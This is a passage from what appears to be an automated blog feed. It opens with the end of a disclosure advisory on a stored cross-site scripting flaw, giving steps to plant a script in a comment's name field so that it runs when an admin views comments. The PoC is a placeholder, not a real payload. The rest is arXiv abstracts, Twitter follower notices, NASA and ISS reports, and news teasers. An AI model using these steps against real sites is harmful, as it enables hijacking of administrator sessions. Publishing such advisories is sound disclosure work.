Manual steps to reproduce the vulnerability ...
1. Open the application with an article
2. Write a comment and include as name to the comment a script code payload
3. Save to submit via POST method request
Note: Now the attacker awaits the admin watches the comments
4. The malicious script code payload executes on visit of the comments module in the backend
5. Successful reproduce of the remote vulnerability!

Injection Point: http://ift.tt/2fCkkqK
Execution Point: http://ift.tt/2g4AlnO

PoC: Exploitation (comment_name)

<[PAYLOAD EXECUTION VIA NAME OF THE COMMENTS INPUT!]>

test message by pentester

2016-11-05 8:05 pm



Source: Gmail -> IFTTT-> Blogger

[FD] Apple iOS 10.1 - Multiple Access Permission Vulnerabilities

iPhone Secretly Sends Your Call History to Apple Even If iCloud Backups are Turned Off

In the fight against encryption, Apple has positioned itself as a staunch defender of its user privacy by refusing the federal officials to provide encryption backdoors into its products, as well as implementing better encryption for its products. However, a new report from a security firm suggests Apple's online syncing service iCloud secretly stores logs of its users' private information


from The Hacker News http://ift.tt/2gmxDwN
via IFTTT

I have a new follower on Twitter


TotalTrax, Inc.
TotalTrax, Inc. is the leading provider of real time vehicle, driver, impact and inventory tracking technologies.
Newport, De
http://t.co/1tXqddlDJ4
Following: 769 - Followers: 1287

November 18, 2016 at 01:30AM via Twitter http://twitter.com/TotalTrax

Soyuz vs Supermoon


Faster than a speeding bullet, more powerful than a locomotive, and able to leap tall buildings in a single bound, this Soyuz rocket stands on the launch pad at Baikonur Cosmodrome in Kazakhstan on November 14. Beyond it rises a supermoon, but fame for exceptional feats of speed, strength, and agility is not the reason November's Full Moon was given this popular name. Instead, whenever a Full Moon shines near perigee, the closest point in its elliptical orbit around Earth, it appears larger and brighter than other more distant Full Moons, and so a supermoon is born. In fact, November's supermoon was the second of three consecutive supermoons in 2016. It was also the closest and most superest Full Moon since 1948. Meanwhile, the mild mannered Soyuz rocket is scheduled to launch its Expedition 50/51 crew to the International Space Station today, November 17. via NASA http://ift.tt/2fZbGzn

Thursday, November 17, 2016

I have a new follower on Twitter


Richard Perry
I show people who want to make a difference 🌎 how to walk their talk with purpose & power. And I give awesome high fives! Grab Your FREE eBook📚 + Training🔽🔽
Wilkes-Barre, PA
https://t.co/IWnBpP8KKt
Following: 4509 - Followers: 5906

November 17, 2016 at 11:05PM via Twitter http://twitter.com/ThePathOfMe

I have a new follower on Twitter


Richard W Newton
Speaker, Founder & MD at @freshlearninghq. Adventurous Business Traveler | Conferenciante, Fundador y DG de https://t.co/OJulUeaZR5 | Tweets: EN/ES
tbc
https://t.co/tJteTQ6HUP
Following: 15476 - Followers: 17381

November 17, 2016 at 10:40PM via Twitter http://twitter.com/richardwnewton

I have a new follower on Twitter


Charles
Consultant to 400+ Businesses In The Past 15yrs | Founder/CEO | Big Ideas | Macro Solutions | VC | Think Beyond Your Own Lifetime | Yes, I'm Wearing Black Again
United States
https://t.co/j4ia3ZSJ44
Following: 18913 - Followers: 61778

November 17, 2016 at 09:35PM via Twitter http://twitter.com/WishExist

Explicable Robot Planning as Minimizing Distance from Expected Behavior. (arXiv:1611.05497v1 [cs.AI])

In order for robots to be integrated effectively into human work-flows, it is not enough to address the question of autonomy but also how their actions or plans are being perceived by their human counterparts. When robots generate task plans without such considerations, they may often demonstrate what we refer to as inexplicable behavior from the point of view of humans who may be observing it. This problem arises due to the human observer's partial or inaccurate understanding of the robot's deliberative process and/or the model (i.e. capabilities of the robot) that informs it. This may have serious implications on the human-robot work-space, from increased cognitive load and reduced trust in the robot from the human, to more serious concerns of safety in human-robot interactions. In this paper, we propose to address this issue by learning a distance function that can accurately model the notion of explicability, and develop an anytime search algorithm that can use this measure in its search process to come up with progressively explicable plans. As the first step, robot plans are evaluated by human subjects based on how explicable they perceive the plan to be, and a scoring function called explicability distance based on the different plan distance measures is learned. We then use this explicability distance as a heuristic to guide our search in order to generate explicable robot plans, by minimizing the plan distances between the robot's plan and the human's expected plans. We conduct our experiments in a toy autonomous car domain, and provide empirical evaluations that demonstrate the usefulness of the approach in making the planning process of an autonomous agent conform to human expectations.



from cs.AI updates on arXiv.org http://ift.tt/2fBqjvP
via IFTTT

Zero-Shot Visual Question Answering. (arXiv:1611.05546v1 [cs.CV])

Part of the appeal of Visual Question Answering (VQA) is its promise to answer new questions about previously unseen images. Most current methods demand training questions that illustrate every possible concept, and will therefore never achieve this capability, since the volume of required training data would be prohibitive. Answering general questions about images requires methods capable of Zero-Shot VQA, that is, methods able to answer questions beyond the scope of the training questions. We propose a new evaluation protocol for VQA methods which measures their ability to perform Zero-Shot VQA, and in doing so highlights significant practical deficiencies of current approaches, some of which are masked by the biases in current datasets. We propose and evaluate several strategies for achieving Zero-Shot VQA, including methods based on pretrained word embeddings, object classifiers with semantic embeddings, and test-time retrieval of example images. Our extensive experiments are intended to serve as baselines for Zero-Shot VQA, and they also achieve state-of-the-art performance in the standard VQA evaluation setting.



from cs.AI updates on arXiv.org http://ift.tt/2g3FKLP
via IFTTT

Stream Packing for Asynchronous Multi-Context Systems using ASP. (arXiv:1611.05640v1 [cs.LO])

When a processing unit relies on data from external streams, we may face the problem that the stream data needs to be rearranged in a way that allows the unit to perform its task(s). On arrival of new data, we must decide whether there is sufficient information available to start processing or whether to wait for more data. Furthermore, we need to ensure that the data meets the input specification of the processing step. In the case of multiple input streams it is also necessary to coordinate which data from which incoming stream should form the input of the next process instantiation. In this work, we propose a declarative approach as an interface between multiple streams and a processing unit. The idea is to specify via answer-set programming how to arrange incoming data in packages that are suitable as input for subsequent processing. Our approach is intended for use in asynchronous multi-context systems (aMCSs), a recently proposed framework for loose coupling of knowledge representation formalisms that allows for online reasoning in a dynamic environment. Contexts in aMCSs process data streams from external sources and other contexts.



from cs.AI updates on arXiv.org http://ift.tt/2fBn1sw
via IFTTT

Learning to detect and localize many objects from few examples. (arXiv:1611.05664v1 [cs.CV])

The current trend in object detection and localization is to learn predictions with high capacity deep neural networks trained on a very large amount of annotated data and using a high amount of processing power. In this work, we propose a new neural model which directly predicts bounding box coordinates. The particularity of our contribution lies in the local computations of predictions with a new form of local parameter sharing which keeps the overall amount of trainable parameters low. Key components of the model are spatial 2D-LSTM recurrent layers which convey contextual information between the regions of the image. We show that this model is more powerful than the state of the art in applications where training data is not as abundant as in the classical configuration of natural images and Imagenet/Pascal VOC tasks. We particularly target the detection of text in document images, but our method is not limited to this setting. The proposed model also facilitates the detection of many objects in a single image and can deal with inputs of variable sizes without resizing.



from cs.AI updates on arXiv.org http://ift.tt/2g3A1Gb
via IFTTT

Study on Feature Subspace of Archetypal Emotions for Speech Emotion Recognition. (arXiv:1611.05675v1 [cs.LG])

Feature subspace selection is an important part in speech emotion recognition. Most of the studies are devoted to finding a feature subspace for representing all emotions. However, some studies have indicated that the features associated with different emotions are not exactly the same. Hence, traditional methods may fail to distinguish some of the emotions with just one global feature subspace. In this work, we propose a new divide and conquer idea to solve the problem. First, the feature subspaces are constructed for all the combinations of every two different emotions (emotion-pair). Bi-classifiers are then trained on these feature subspaces respectively. The final emotion recognition result is derived by the voting and competition method. Experimental results demonstrate that the proposed method can get better results than the traditional multi-classification method.



from cs.AI updates on arXiv.org http://ift.tt/2fBhToj
via IFTTT

Optimal Dynamic Coverage Infrastructure for Large-Scale Fleets of Reconnaissance UAVs. (arXiv:1611.05735v1 [cs.AI])

Current state of the art in the field of UAV activation relies solely on human operators for the design and adaptation of the drones' flying routes. Furthermore, this is being done today on an individual level (one vehicle per operator), with some exceptions of a handful of new systems, that are comprised of a small number of self-organizing swarms, manually guided by a human operator.

Drone-based monitoring is of great importance in a variety of civilian domains, such as road safety, homeland security, and even environmental control. In its military aspect, efficiently detecting evading targets by a fleet of unmanned drones has an ever increasing impact on the ability of modern armies to engage in warfare. The latter is true both for traditional symmetric conflicts among armies and for asymmetric ones. Be it a speeding driver, a polluting trailer or a covert convoy, the basic challenge remains the same -- how can its detection probability be maximized using as few drones as possible.

In this work we propose a novel approach for the optimization of large scale swarms of reconnaissance drones -- capable of producing on-demand optimal coverage strategies for any given search scenario. Given an estimation cost of the threat's potential damages, as well as types of monitoring drones available and their comparative performance, our proposed method generates an analytically provable strategy, stating the optimal number and types of drones to be deployed, in order to cost-efficiently monitor a pre-defined region for targets maneuvering using a given road network.

We demonstrate our model using a unique dataset of the Israeli transportation network, on which different schemes for drone deployment are evaluated.



from cs.AI updates on arXiv.org http://ift.tt/2g3DS5Y
via IFTTT

Fast Non-Parametric Tests of Relative Dependency and Similarity. (arXiv:1611.05740v1 [cs.AI])

We introduce two novel non-parametric statistical hypothesis tests. The first test, called the relative test of dependency, enables us to determine whether one source variable is significantly more dependent on a first target variable or a second. Dependence is measured via the Hilbert-Schmidt Independence Criterion (HSIC). The second test, called the relative test of similarity, is used to determine which of the two samples from arbitrary distributions is significantly closer to a reference sample of interest and the relative measure of similarity is based on the Maximum Mean Discrepancy (MMD). To construct these tests, we have used as our test statistics the difference of HSIC statistics and of MMD statistics, respectively. The resulting tests are consistent and unbiased, and have favorable convergence properties. The effectiveness of the relative dependency test is demonstrated on several real-world problems: we identify language groups from a multilingual parallel corpus, and we show that tumor location is more dependent on gene expression than chromosome imbalance. We also demonstrate the performance of the relative test of similarity over a broad selection of model comparison problems in deep generative models.



from cs.AI updates on arXiv.org http://ift.tt/2fBfYQy
via IFTTT

Learning to reinforcement learn. (arXiv:1611.05763v1 [cs.LG])

In recent years deep reinforcement learning (RL) systems have attained superhuman performance in a number of challenging task domains. However, a major limitation of such applications is their demand for massive amounts of training data. A critical present objective is thus to develop deep RL methods that can adapt rapidly to new tasks. In the present work we introduce a novel approach to this challenge, which we refer to as deep meta-reinforcement learning. Previous work has shown that recurrent networks can support meta-learning in a fully supervised context. We extend this approach to the RL setting. What emerges is a system that is trained using one RL algorithm, but whose recurrent dynamics implement a second, quite separate RL procedure. This second, learned RL algorithm can differ from the original one in arbitrary ways. Importantly, because it is learned, it is configured to exploit structure in the training domain. We unpack these points in a series of seven proof-of-concept experiments, each of which examines a key aspect of deep meta-RL. We consider prospects for extending and scaling up the approach, and also point out some potentially important implications for neuroscience.



from cs.AI updates on arXiv.org http://ift.tt/2fmkPSB
via IFTTT

Nothing Else Matters: Model-Agnostic Explanations By Identifying Prediction Invariance. (arXiv:1611.05817v1 [stat.ML])

At the core of interpretable machine learning is the question of whether humans are able to make accurate predictions about a model's behavior. Assumed in this question are three properties of the interpretable output: coverage, precision, and effort. Coverage refers to how often humans think they can predict the model's behavior, precision to how accurate humans are in those predictions, and effort is either the up-front effort required in interpreting the model, or the effort required to make predictions about a model's behavior.

In this work, we propose anchor-LIME (aLIME), a model-agnostic technique that produces high-precision rule-based explanations for which the coverage boundaries are very clear. We compare aLIME to linear LIME with simulated experiments, and demonstrate the flexibility of aLIME with qualitative examples from a variety of domains and tasks.



from cs.AI updates on arXiv.org http://ift.tt/2eLJsME
via IFTTT

Designing and Training Feedforward Neural Networks: A Smooth Optimisation Perspective. (arXiv:1611.05827v1 [cs.LG])

Despite the recent great success of deep neural networks in various applications, designing and training a deep neural network is still among the greatest challenges in the field. In this work, we present a smooth optimisation perspective on designing and training multilayer Feedforward Neural Networks (FNNs) in the supervised learning setting. By characterising the critical point conditions of an FNN based optimisation problem, we identify the conditions to eliminate local optima of the corresponding cost function. Moreover, by studying the Hessian structure of the cost function at the global minima, we develop an approximate Newton FNN algorithm, which is capable of alleviating the vanishing gradient problem. Finally, our results are numerically verified on two classic benchmarks, i.e., the XOR problem and the four region classification problem.



from cs.AI updates on arXiv.org http://ift.tt/2g0KznG
via IFTTT

Predicting Clinical Events by Combining Static and Dynamic Information Using Recurrent Neural Networks. (arXiv:1602.02685v2 [cs.LG] UPDATED)

In clinical data sets we often find static information (e.g. patient gender, blood type, etc.) combined with sequences of data that are recorded during multiple hospital visits (e.g. medications prescribed, tests performed, etc.). Recurrent Neural Networks (RNNs) have proven to be very successful for modelling sequences of data in many areas of Machine Learning. In this work we present an approach based on RNNs, specifically designed for the clinical domain, that combines static and dynamic information in order to predict future events. We work with a database collected in the Charité Hospital in Berlin that contains complete information concerning patients that underwent a kidney transplantation. After the transplantation three main endpoints can occur: rejection of the kidney, loss of the kidney and death of the patient. Our goal is to predict, based on information recorded in the Electronic Health Record of each patient, whether any of those endpoints will occur within the next six or twelve months after each visit to the clinic. We compared different types of RNNs that we developed for this work, with a model based on a Feedforward Neural Network and a Logistic Regression model. We found that the RNN that we developed based on Gated Recurrent Units provides the best performance for this task. We also used the same models for a second task, i.e., next event prediction, and found that here the model based on a Feedforward Neural Network outperformed the other models. Our hypothesis is that long-term dependencies are not as relevant in this task.



from cs.AI updates on arXiv.org http://ift.tt/1ScrW0p
via IFTTT

Finite LTL Synthesis is EXPTIME-complete. (arXiv:1609.04371v2 [cs.LO] UPDATED)

LTL synthesis -- the construction of a function to satisfy a logical specification formulated in Linear Temporal Logic -- is a 2EXPTIME-complete problem with relevant applications in controller synthesis and a myriad of artificial intelligence applications. In this research note we consider De Giacomo and Vardi's variant of the synthesis problem for LTL formulas interpreted over finite rather than infinite traces. Rather surprisingly, given the existing claims on complexity, we establish that LTL synthesis is EXPTIME-complete for the finite interpretation, and not 2EXPTIME-complete as previously reported. Our result coincides nicely with the planning perspective where non-deterministic planning with full observability is EXPTIME-complete and partial observability increases the complexity to 2EXPTIME-complete; a recent related result for LTL synthesis shows that in the finite case with partial observability, the problem is 2EXPTIME-complete.



from cs.AI updates on arXiv.org http://ift.tt/2cJtPEw
via IFTTT

Universal adversarial perturbations. (arXiv:1610.08401v2 [cs.CV] UPDATED)

Given a state-of-the-art deep neural network classifier, we show the existence of a universal (image-agnostic) and very small perturbation vector that causes natural images to be misclassified with high probability. We propose a systematic algorithm for computing universal perturbations, and show that state-of-the-art deep neural networks are highly vulnerable to such perturbations, albeit being quasi-imperceptible to the human eye. We further empirically analyze these universal perturbations and show, in particular, that they generalize very well across neural networks. The surprising existence of universal perturbations reveals important geometric correlations among the high-dimensional decision boundary of classifiers. It further outlines potential security breaches with the existence of single directions in the input space that adversaries can possibly exploit to break a classifier on most natural images.



from cs.AI updates on arXiv.org http://ift.tt/2eHr3Q8
via IFTTT

Edward: A library for probabilistic modeling, inference, and criticism. (arXiv:1610.09787v2 [stat.CO] UPDATED)

Probabilistic modeling is a powerful approach for analyzing empirical information. We describe Edward, a library for probabilistic modeling. Edward's design reflects an iterative process pioneered by George Box: build a model of a phenomenon, make inferences about the model given data, and criticize the model's fit to the data. Edward supports a broad class of probabilistic models, efficient algorithms for inference, and many techniques for model criticism. The library builds on top of TensorFlow to support distributed training and hardware such as GPUs. Edward enables the development of complex probabilistic models and their algorithms at a massive scale.



from cs.AI updates on arXiv.org http://ift.tt/2fb93u5
via IFTTT

A Way out of the Odyssey: Analyzing and Combining Recent Insights for LSTMs. (arXiv:1611.05104v1 [cs.CL])

LSTMs have become a basic building block for many deep NLP models. In recent years, many improvements and variations have been proposed for deep sequence models in general, and LSTMs in particular. We propose and analyze a series of architectural modifications for LSTM networks resulting in improved performance for text classification datasets. We observe compounding improvements on traditional LSTMs using Monte Carlo test-time model averaging, deep vector averaging (DVA), and residual connections, along with four other suggested modifications. Our analysis provides a simple, reliable, and high quality baseline model.



from cs.AI updates on arXiv.org http://ift.tt/2g0jClG
via IFTTT

Sonya Clark Receives Anonymous Was a Woman Prize

Anonymous Was a Woman honors women artists over 40 who are at a critical moment in their lives or careers. Named after a line in a Virginia Woolf ...

from Google Alert - anonymous http://ift.tt/2glBMkr
via IFTTT

Ravens Video: Terrell Suggs reveals meaning behind Hacksaw Smithers, the alias he used on Dak Prescott conference call (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Disable rate content for anonymous users

I checked "Use Fivestar to rate content" for all roles except anonymous role. However, I can still vote if I am not logged in. Also, I get an AJAX Error ...

from Google Alert - anonymous http://ift.tt/2fALP43
via IFTTT

User mail token PHP notices for anonymous

... where you have full user accounts and anonymous user accounts. If the token is accessed for an anonymous user then a PHP notice is triggered:

from Google Alert - anonymous http://ift.tt/2fJ4SH4
via IFTTT

ISS Daily Summary Report – 11/16/2016

Human Research Facility (HRF) Software Upgrades: Today the crew initiated the second day of HRF software transitions. Today’s upgrades will be to the HRF Personal Computer-3 (HRFPC-3). Based on the compatibility issue observed during the HRF Rack 1 PC upgrade yesterday, ground teams were able to command to the HRF PC without needing to access the Rack Interface Controller (RIC). The new software loads will support new experiments and on-board capabilities. Over the next two days, the HRF Rack 2 PC and HRFPC3 will be updated as well. The HRF Racks provide an on-orbit laboratory that enables scientists conducting human life science research to evaluate the physiological, behavioral, and chemical changes induced by space flight. Research performed using the capabilities within the racks provide data to help scientists understand how the human body adapts to long-duration space flight.

Strata-1 Card Changeout: The crew completed a changeout of four Strata Secure Digital (SD) data cards and transferred photos to a Station Support Computer (SSC) for ground teams to downlink and distribute. Strata-1 investigates the properties and behavior of regolith on small, airless bodies. Regolith is the impact-shattered “soil” found on asteroids, comets, the Moon, and other airless worlds, but it is different from soil here on Earth in that it contains no living material. Strata-1’s goal is to give us answers about how regolith behaves and moves in microgravity, how easy or difficult it is to anchor a spacecraft in regolith, how it interacts with spacecraft and spacesuit materials, and other important properties. It is important to NASA to know how to set anchors in regolith, how to safely move and process large volumes of regolith, and predict and prevent risk to spacecraft and astronauts visiting these small bodies. Also, understanding the whole-body context of material returned to Earth from small asteroids, such as by the NASA OSIRIS-REx mission, the JAXA Hayabusa 1 and 2 missions, and the proposed NASA Asteroid Redirect Mission (ARM) is scientifically beneficial.

Cygnus Departure Preparations: Today, Robotics Ground Controllers maneuvered the Space Station Remote Manipulator System (SSRMS) and grappled Cygnus for release and departure scheduled for Monday, November 21st. The crew then performed an On Board Training (OBT) session to review release procedures.

iPad Air 2 Deploy: iPad Air 2 were deployed in the place of the current iPad 3s. The iPad Air 2 will be used for everyday crew functions including viewing timelines, procedures and crew messages. These iPads have the ESA Everywear app and other crew preference apps including Microsoft Office Products (Word, Excel, PowerPoint). Two iPad 3s will remain onboard for several ongoing payload operations that are not able to update to the iPad Air 2s and one iPad 3 will continue to be used for the Wall Clock.

Oxygen Generation System (OGS) Hydrogen Orbital Replacement Unit (ORU) Quick Disconnect (QD) Inspection: The crew accessed and inspected QD “DIW FROM RSA” on the OGS Hydrogen Dome. This QD was not able to be fully mated during last week’s Hydrogen ORU replacement and had to be secured with Kapton Tape. The QD was inspected for leaks as well as any movement out of position. No connections are demated or mated during this task. Crew reported no visible water in the rack or on or around the QD, and OGS was reactivated.

Space Station Remote Manipulator System (SSRMS) Elbow Camera Failure: This morning, during operations to power SSRMS in preparation for grappling Cygnus, the tip elbow camera initialized with color bars. Multiple power cycle and reroute attempts have not been successful to recover the camera. This camera was providing clearance and alignment views which can be substituted with the SSRMS Base Elbow camera. Loss of the SSRMS Tip Elbow camera does not impact unberth and release operations for Cygnus.

Today’s Planned Activities
All activities were completed unless otherwise noted.
MORZE. Evaluation using SPRUT-2. Tagup with specialists FSL MPCC Laptop Powering On & Software Image Installation HRF1 PC 3 USB Load Installation Preparation Monitoring ИП-1 Air Flow Sensors ISS RS ППС-26, ППС-31 Plug-in Audit MORZE. Psycho-physiological Evaluation: Tsentrovka, SENSOR Tests Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Water Recovery System Waste Water Tank Drain Termination Meteor Hard Drive Swapout MORZE. Psycho-physiological Evaluation: SUPOS Test MORZE. Psycho-physiological Evaluation: Cattell’s Test OTKLIK. Hardware Monitoring СОЖ maintenance BIMS. Operator Assistance During the Experiment BIMS. Experiment Tagup with specialists Onboard Training (OBT) Robotics On-board Trainer (ROBoT) Setup Total Organic Carbon Analyzer (TOCA) Sample Data Record iPad Air 2 Deploy iPad 3 Move Video Recording of Greetings On-board Training (OBT) Cygnus Robotics Onboard Trainer (ROBoT) Release ISS RS System Power Panels ППС-26 and ППС-31 Plug-in Audit MORZE. Psycho-physiological Evaluation: Strelau Test On-board Training (OBT) Cygnus Review MORZE. Closeout Ops Soyuz 732 Samsung Tablet Recharge, Initiate Oxygen Generation System Hydrogen Orbital Replacement Unit Quick Disconnect Inspection INTERACTION-2 Experiment Ops Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Remove and Replace INTERACTION-2. Experiment Ops VEG-03 Plant Photo Soyuz 732 Samsung Tablet Recharge, Terminate Station Support Computer (SSC) 5 Reload Preparation Regenerative Environmental Control and Life Support System (RGN) Recycle Tank Fill CB/ISS CREW CONFERENCE HRF1 PC 3 USB Load Installation Conclude

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
SSRMS Cygnus Grapple JEMRMS Ground Control Handhold Exp Platform Sample View

Three-Day Look Ahead:
Thursday, 11/17: DoseTrack, STRATA Card, Cygnus Egress
Friday, 11/18: Cygnus Vestibule Demate, Node 1 CPA Install, RWS Setup
Saturday, 11/19: 49S Docking

QUICK ISS Status – Environmental Control Group:
Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Operate
Major Constituent Analyzer (MCA) Node 3: Idle
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2eJIJvo
via IFTTT

Military police probe anonymous threat to Dutch airport

THE HAGUE, Netherlands (AP) - Military police have launched an investigation at a Dutch airport based on an anonymous threat. Police said in a ...

from Google Alert - anonymous http://ift.tt/2glLa8j
via IFTTT

New Hack: How to Bypass iPhone Passcode to Access Photos and Messages

Setting a passcode on your iPhone is the first line of defense to help prevent other people from accessing your personal details. However, it's pretty much easy for anyone with access to your iPhone to bypass the passcode protection (doesn't matter if you configured Touch ID or not) and access your personal photos and messages. A new critical security flaw discovered in iOS 8 and newer,


from The Hacker News http://ift.tt/2gkS3Hf
via IFTTT

The Heart and Soul Nebulas


Is the heart and soul of our Galaxy located in Cassiopeia? Possibly not, but that is where two bright emission nebulas nicknamed Heart and Soul can be found. The Heart Nebula, officially dubbed IC 1805 and visible in the featured image on the right, has a shape reminiscent of a classical heart symbol. Both nebulas shine brightly in the red light of energized hydrogen. Several young open clusters of stars populate the image and are visible here in blue, including the nebula centers. Light takes about 6,000 years to reach us from these nebulas, which together span roughly 300 light years. Studies of stars and clusters like those found in the Heart and Soul Nebulas have focused on how massive stars form and how they affect their environment. via NASA http://ift.tt/2fYA4mm

Wednesday, November 16, 2016

A São Sebastião (Anonymous)

Composer, Anonymous. Key, A major. Language, Portuguese. Piece Style, Early 20th century. Instrumentation, voice, organ ...

from Google Alert - anonymous http://ift.tt/2fHonj2
via IFTTT

I have a new follower on Twitter


Exiger
Global regulatory and financial crime, risk and compliance company. Our experts offer practical advice and cutting edge, technology-enabled solutions.
Americas, EMEA, APAC
https://t.co/PySOmXk8lo
Following: 87 - Followers: 289

November 16, 2016 at 09:55PM via Twitter http://twitter.com/ExigerLLC

Machine Learning Approach for Skill Evaluation in Robotic-Assisted Surgery. (arXiv:1611.05136v1 [cs.AI])

Evaluating surgeon skill has predominantly been a subjective task. Development of objective methods for surgical skill assessment is of increased interest. Recently, with technological advances such as robotic-assisted minimally invasive surgery (RMIS), new opportunities for objective and automated assessment frameworks have arisen. In this paper, we applied machine learning methods to automatically evaluate performance of the surgeon in RMIS. Six important movement features were used in the evaluation including completion time, path length, depth perception, speed, smoothness and curvature. Different classification methods were applied to discriminate expert and novice surgeons. We test our method on real surgical data for a suturing task and compare the classification result with the ground truth data (obtained by manual labeling). The experimental results show that the proposed framework can classify surgical skill level with relatively high accuracy of 85.7%. This study demonstrates the ability of machine learning methods to automatically classify expert and novice surgeons using movement features for different RMIS tasks. Due to the simplicity and generalizability of the introduced classification method, it is easy to implement in existing trainers.



from cs.AI updates on arXiv.org http://ift.tt/2eHN9mn
via IFTTT

The Effects of Relative Importance of User Constraints in Cloud of Things Resource Discovery: A Case Study. (arXiv:1611.05170v1 [cs.AI])

Over the last few years, the number of smart objects connected to the Internet has grown exponentially in comparison to the number of services and applications. The integration between Cloud Computing and Internet of Things, named as Cloud of Things, plays a key role in managing the connected things, their data and services. One of the main challenges in Cloud of Things is the resource discovery of the smart objects and their reuse in different contexts. Most of the existent work uses some kind of multi-criteria decision analysis algorithm to perform the resource discovery, but does not evaluate the impact that the user constraints have in the final solution. In this paper, we analyse the behaviour of the SAW, TOPSIS and VIKOR multi-objective decision analysis algorithms and the impact of user constraints on them. We evaluated the quality of the proposed solutions using the Pareto-optimality concept.



from cs.AI updates on arXiv.org http://ift.tt/2giyj5Z
via IFTTT